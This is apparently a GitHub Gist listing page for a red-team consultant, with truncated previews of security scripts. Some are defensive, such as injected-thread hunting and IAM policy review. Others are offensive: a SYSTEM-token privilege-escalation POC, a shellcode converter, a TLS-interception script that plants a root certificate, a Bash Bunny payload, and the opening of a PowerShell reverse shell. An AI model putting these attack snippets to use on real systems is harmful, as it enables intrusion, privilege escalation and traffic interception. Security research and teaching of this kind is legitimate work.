Offensive Sencha Consultant

Mariusz B. mgeeky
@mgeeky
mgeeky / Get-InjectedThread.ps1
Created Feb 7, 2020 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
View Get-InjectedThread.ps1
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@mgeeky
mgeeky / getsystem_parent.cpp
Created Jan 25, 2020 — forked from xpn/getsystem_parent.cpp
A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
View getsystem_parent.cpp
#include "stdafx.h"
BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
TOKEN_PRIVILEGES tp;
LUID luid;
TOKEN_PRIVILEGES tpPrevious;
DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);
if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;
@mgeeky
mgeeky / bin2c.py
Created Jan 24, 2020
Straightforward Python utility for converting a binary file into a C hexstring
View bin2c.py
#!/usr/bin/python3
import sys
def main(argv):
    if len(argv) != 2:
        print('Usage: ./bin2c.py <shellcodeFile>')
        return False
    with open(argv[1], 'rb') as f:
        b = f.read()
@mgeeky
mgeeky / .htaccess
Created Jan 19, 2020 — forked from curi0usJack/.htaccess
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
View .htaccess
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-available/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@mgeeky
mgeeky / RickAstleyBunny.txt
Created Jan 17, 2020
Dancing browser window with never giving up Rick Astley on a Bash Bunny payload
View RickAstleyBunny.txt
#!/bin/bash
ATTACKMODE HID VID_0X05AC PID_0X021E
LED R 200
delay=10
Q GUI r
Q DELAY 100
Q STRING cmd /c start https://www.youtube.com/watch?v=dQw4w9WgXcQ
@mgeeky
mgeeky / InterceptHuzzah.ps1
Last active Jan 15, 2020
Casey Smith's (@subTee) Intercept Huzzah, demonstrating a means of TLS interception through an anomalous Trusted Root CA certificate being injected
View InterceptHuzzah.ps1
<#
.SYNOPSIS
This script demonstrates the ability to capture and tamper with Web sessions.
For secure sessions, this is done by dynamically writing certificates to match the requested domain.
This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack.
Function: InterceptHuzzah
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@mgeeky
mgeeky / Get-Whoami.ps1
Last active Jan 12, 2020
This is a modified version of Ruben Boonen's (@fuzzysec) Get-OSTokenInformation, suitable for dumping the current process token in a whoami fashion. Useful for a quick "whoami" without using the whoami cmd command. (Source: https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-OSTokenInformation.ps1)
View Get-Whoami.ps1
function Get-Whoami {
Get-OSTokenInformation -PrettyPrint
}
function Get-OSTokenInformation {
<#
.SYNOPSIS
Get-OSTokenInformation uses a variety of API's to pull in all (accessible) user tokens and queries them for details.
Notes:
@mgeeky
mgeeky / server-backup.sh
Created Dec 15, 2019
Simple Linux server backup script automating the use of rsync and 7zip to create N rotated backup archives.
View server-backup.sh
#!/bin/bash
#
# Simple utility to perform rotated compressed backups.
# Works best when added to crontab:
# 0 21 * * 1 /root/server-backup.sh
#
# Requirements:
# $ sudo apt-get install p7zip-full rsync
#
@mgeeky
mgeeky / evaluate-iam-role.sh
Last active Dec 12, 2019
Evaluates specified AWS IAM Role or Policy given their name/Arn. Dumps all of the attached policies in case of Role and all of defined policy statements. Then goes through allowed permissions to pick all of them out. Finally, checks every allowed permission against a list of known troublesome ones.
View evaluate-iam-role.sh
#!/bin/bash
#
# Evaluates specified AWS IAM Role or Policy given their name/Arn.
# Dumps all of the attached policies in case of Role and all of defined
# policy statements. Then goes through allowed permissions to pick all of them out.
# Finally, checks every allowed permission against a list of known troublesome ones.
#
# Mariusz B., mgeeky '19, <mb@binary-offensive.com>
# v0.1
#
@mgeeky
mgeeky / mini-reverse.ps1
Last active Nov 25, 2019 — forked from staaldraad/mini-reverse.ps1
A reverse shell in PowerShell
View mini-reverse.ps1
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 8080);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;